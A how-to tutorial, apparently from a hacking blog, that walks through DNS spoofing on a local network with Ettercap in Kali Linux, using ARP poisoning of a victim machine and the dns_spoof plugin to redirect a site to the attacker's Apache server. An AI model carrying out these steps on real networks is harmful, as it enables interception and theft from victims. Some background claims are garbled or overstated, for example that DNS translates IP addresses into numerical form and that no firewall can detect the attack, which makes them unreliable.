What is DNS?
When we search a website on our system, it doesn’t understand the readable form of the name but it understands the IP addresses. Every website has a unique IP address. The DNS only translates the IP addresses to the numerical form so that our system can understand. You can open a website using its IP address also but it is not possible to remember the IP address of all websites for a human being. That is why DNS is created.
To increase the performance the DNS system saves the translated for some time in our system which is called cache. On the off chance that if it gets another request for the same translation, it can answer without asking some other server, until the point when that cache expires.
What is DNS Spoofing?
DNS spoofing is a part of computer hacking in which searched domain names are diverted to some other incorrect IP address due to which the traffic of the victim’s system is diverted to the attacker’s system. Using DNS spoofing poison is injected into the address resolution protocol of the victim.
It is very hard to detect this attack. Neither firewall nor antivirus can detect this attack.
Consider that an attacker started DNS spoofing on the system of a victim and diverted the IP of facebook.com to the attacker’s own IP address. If the victim tries to open facebook.com, the DNS will open the attacker’s IP instead of facebook.com. If the attacker does that, there is a big probability of stealing data or cookies from the victim’s system.
So, let’s have a look at the tutorial.
Configure Ettercap in Kali Linux:
There are a lot of tools that can be used to do DNS spoofing but in this tutorial, we’re gonna use an open-source and easy to use a tool called Ettercap. It comes by default in Kali Linux. Simply go to Show Applications and search for ettercap. Both the GUI and CLI interface of ettercap is available in Kali Linux.
Before using the tool, you have to do some configuration of the tool. To do that open the terminal and type the command given below to open the configuration file of ettercap.
The file will open up in the text editor and after that scroll down and find out the line where Linux word is written like the picture below.
Here we will use our IP tables. To use IP tables you have to activate it. To activate simply remove the hash from the front of the two command lines that are below the iptables like the picture given below and save the file and exit.
After activating the command start the apache server by using the command
service apache2 start
Now, copy your Kali Linux machine’s local IP address and paste and search it on your web browser. If it opens the default apache2 web page then the apache2 webserver started successfully.
Here we are using our own website byethack.blogspot.com to do DNS spoofing.
Now we have to do one more configuration. We have to edit the etter.dns file. To go to the file type the command given below on the terminal. Before opening copy your local IP address.
Now scroll the text file below and stop at the line Microsoft sucks present. Now you will see the lines just like the image below.
And now change the microsoft.com domain name to the website name that you want to attack and change the IP address to your local IP address where the Apache web server is present like the example picture is given below.
Now save the file and quit.
Now open the terminal and give the command given below to open the ettercap tool in GUI mode.
Now at the above go to Sniff> Unified Sniffing and a pop-up will appear asking to choose the Network interface. If you’re using ethernet then choose eth0 and if you’re using WLAN then the wlan0 option will appear.
So, here we’re using ethernet. So we’re selecting eth0.
After choosing OK, it will automatically start sniffing but we have to stop the sniffing. To stop the auto sniffing go to Start> Stop Sniffing.
Now, we have to set up the target. Before setting up the Target, we have to scan the Hosts. Go to Hosts option and choose Scan for Host. It will scan the local network and it will show up a list of all systems connected to the Network. To view the list go to Hosts> Host List.
In the picture, the first one is our default gateway, the second one is our host machine and the third one is our target machine.
Now, select the default gateway(The first IP) and add it to target 2 by clicking the Add to Target 2 option. And Now add the third Ip address of the victim’s machine to target 1 by clicking Add to Target 1.
Now the targets will be set under the Target option. Here you will get an option to delete the selected targets or to add another target.
Now, go to the MITM option and choose ARP Poisoning. A popup will appear asking to choose optional parameters. Select the Sniff remote connections and click OK.
Now go to Plugins> Manage the Plugins and choose the dns_spoof and double-click to activate it. At the bottom of the ettercap tool, a message will appear saying Activating dns_spoof plugin.
Congrats! all are set now. Now go to the Start option and click on Start Sniffing. Now if the victim tries to open the byethack.blogspot.com then he will be redirected to the Apache web server that we set earlier. There is a big probability of getting hacked of DNS cache and cookies of the victim’s system.
How to stop the attack:
Go to Start> Stop Sniffing. Now go to the MITM option and click Stop MITM attack. Exit the ettercap. But the attack didn’t stop completely. To stop the attack completely open the terminal and type the two commands given below one by one.
ifconfig eth0 down
ifconfig eth0 up
Now the attack stopped properly.
This tutorial is only for educational purposes. Please try it on your own local network and machine. Don’t try to harm others. Hacking something without the owner’s permission is not ethical. We’re not responsible for any kind of damages.